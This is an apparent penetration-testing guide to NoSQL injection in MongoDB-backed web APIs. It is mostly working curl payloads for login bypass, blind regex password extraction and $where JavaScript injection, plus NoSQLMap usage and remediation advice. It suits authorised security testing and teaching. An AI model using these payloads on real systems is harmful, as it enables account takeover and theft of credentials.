Exploiting NoSQL Injection Vulnerabilities
When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction
Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (
pip install nosqlmap or from GitHub)
- Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting
Workflow
Step 1 — Identify NoSQL Injection Points
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin\"", "password": "test"}'
# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"
# Check for error-based detection
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"query": {"$gt": ""}}'
Step 2 — Perform Authentication Bypass
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'
# Bypass with $gt operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
# Target specific user with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": ".*"}}'
# Bypass using $exists operator
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$exists": true}, "password": {"$exists": true}}'
Step 3 — Extract Data Using Boolean-Based Blind Injection
# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^a"}}'
# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$regex": "^ab"}}'
# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
Step 4 — Exploit JavaScript Injection via $where
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.username == \"admin\""}'
# Time-based detection with sleep
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "sleep(5000) || this.username == \"admin\""}'
# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
-H "Content-Type: application/json" \
-d '{"$where": "this.password.match(/^a/) != null"}'
Step 5 — Use NoSQLMap for Automated Testing
# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install
# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
--method POST \
--data '{"username":"test","password":"test"}'
# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
Step 6 — Test URL Parameter Injection
# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"
# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"
# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
-H "X-User-Id: {'\$ne': null}"
Key Concepts
| Concept | Description |
|---|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass | Using operators to match any document and bypass login checks |
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |
Tools & Systems
| Tool | Purpose |
|---|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell | Direct database interaction for testing query behavior |
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
| Nuclei | Template-based scanner with NoSQL injection detection templates |
| Postman | API testing platform for crafting NoSQL injection requests |
Common Scenarios
- Login Bypass — Bypass MongoDB-backed authentication using
{"$ne": ""} operator injection in username and password fields
- Data Enumeration — Extract database contents character by character using
$regex blind injection when no direct output is visible
- Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
- API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
- Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
Output Format
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)
### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |
### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator
### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls